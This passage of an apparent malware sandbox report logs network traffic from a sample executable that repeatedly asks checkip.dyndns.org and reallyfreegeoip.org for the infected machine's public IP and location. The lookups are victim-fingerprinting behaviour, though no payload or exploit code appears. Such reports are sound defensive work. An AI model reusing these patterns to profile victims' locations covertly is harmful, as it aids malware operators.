                                                                                                                Mar 7, 2025 23:22:20.077133894 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Mar 7, 2025 23:22:20.747411966 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:20 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.949688132.226.247.73807072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Mar 7, 2025 23:22:23.376799107 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Mar 7, 2025 23:22:24.099194050 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:23 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.949690132.226.247.73807072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Mar 7, 2025 23:22:26.627370119 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Mar 7, 2025 23:22:27.313730955 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:27 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.949692132.226.247.73807072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Mar 7, 2025 23:22:29.627748966 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Mar 7, 2025 23:22:30.329211950 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:30 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.949694132.226.247.73807072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Mar 7, 2025 23:22:32.639667988 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Mar 7, 2025 23:22:33.338531971 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:33 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.949696132.226.247.73807072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Mar 7, 2025 23:22:35.743067980 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Mar 7, 2025 23:22:36.444947958 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:36 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.949698132.226.247.73807072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Mar 7, 2025 23:22:38.684065104 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Mar 7, 2025 23:22:39.366400957 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:39 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.949684104.21.96.14437072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-03-07 22:22:16 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-03-07 22:22:17 UTC860INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:17 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 147518
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x2avDsoQNlPumJKDJGueVaP%2BBrIQScj3oG7sZDQgVnHz4M7GxYYRuyFo%2BasPt%2F2GIdhY%2FkyHTyZDrEcHX3NXMpTpNyw%2FGg0iIALF02jjC3n60RC9keA2BsroPQ4vsan59XqKYIcn"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 91cd7d9cfcd2000c-ORD
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=40477&min_rtt=39863&rtt_var=12280&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=68075&cwnd=208&unsent_bytes=0&cid=a801843cfa90ea69&ts=653&x=0"
                                                                                                                2025-03-07 22:22:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.949685104.21.96.14437072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-03-07 22:22:19 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-03-07 22:22:20 UTC854INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:19 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 147521
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RxOjbWFhr12Nh73tlAfyDcO8dm6382J3JnRsGeUVjAv9TMqt3xdn2Ycp1bTt%2F3LaIntNG7xyclcdkMskocLbRP0ORyxHbuh48Fre8vcZR%2FCUpUHeVifq6FrTf5NLHXCiuLFBrHZt"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 91cd7dadcb702231-ORD
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=41123&min_rtt=40427&rtt_var=11992&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=71621&cwnd=194&unsent_bytes=0&cid=8f8e7cb9e1859a9a&ts=643&x=0"
                                                                                                                2025-03-07 22:22:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.949687104.21.96.14437072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-03-07 22:22:22 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-03-07 22:22:23 UTC852INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:23 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 147524
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V0BeXynu9QCvCmPopgOeUPD9hfIIiP9SsSOqcP726UYAEuOCSOVDOz08nO0jNi4lfW6e%2FDsoSzGzocV0pwvpsNTKLzqWZsduDc9WV5RG1SpSX073IK8NL5tjXbmEkBEkHaTCkcs3"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 91cd7dc25a751253-ORD
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=36605&min_rtt=35751&rtt_var=11549&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=73155&cwnd=189&unsent_bytes=0&cid=a3898c9247795d84&ts=746&x=0"
                                                                                                                2025-03-07 22:22:23 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.949689104.21.96.14437072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-03-07 22:22:26 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-03-07 22:22:26 UTC853INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:26 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 147527
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ygkph9YHYrkoJsb749Q0QeFcGbV%2F0gjwR6PoMf0ncOtK%2Fr2LZt2V0SOcNQr92NJ6hshZeMF3vF5e5qp2DjFwLHa5cUY1EeODwZ7txFTUonTo735xrwzS1wG3vmcDwKve04YMuGdd"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 91cd7dd70d587073-ORD
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=40105&min_rtt=37725&rtt_var=12041&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=70890&cwnd=97&unsent_bytes=0&cid=8ae5983a8f13bab0&ts=635&x=0"
                                                                                                                2025-03-07 22:22:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.949691104.21.96.14437072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-03-07 22:22:29 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-03-07 22:22:29 UTC854INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:29 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 147530
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFLD%2BKbHtsjjzYzVyLYoWAcsOLV%2Fr9JURtoEsNbD6TxeyD6LygqCPwznn5V5uFwgHRxYjEIOCRsTSDxpx6RMwF8bpxr5nHFl1r638voofr78fUZtAMFamWAhQvZrH35bFPn6MhnG"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 91cd7de9cf5961fa-ORD
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=39200&min_rtt=39133&rtt_var=11140&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=73037&cwnd=226&unsent_bytes=0&cid=1e2c3979e1153138&ts=648&x=0"
                                                                                                                2025-03-07 22:22:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.949693104.21.96.14437072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-03-07 22:22:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-03-07 22:22:32 UTC856INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:32 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 147533
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VjE1lAcHQ0EIOeYzfxheo3r5G7fHrMVOFGsDbLBi8Srjkqjt3lbiSchFNEPtR04fysQ7ev9TChEkqMYeozP4qk2w%2B5QALZSm4BVkU%2Fjo3oflRVYdwL4xB7Z8XGXldy9COx%2Fz5Y83"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 91cd7dfc8bc72231-ORD
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=38010&min_rtt=37119&rtt_var=11993&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=70585&cwnd=194&unsent_bytes=0&cid=c32eb916022e0a7f&ts=651&x=0"
                                                                                                                2025-03-07 22:22:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
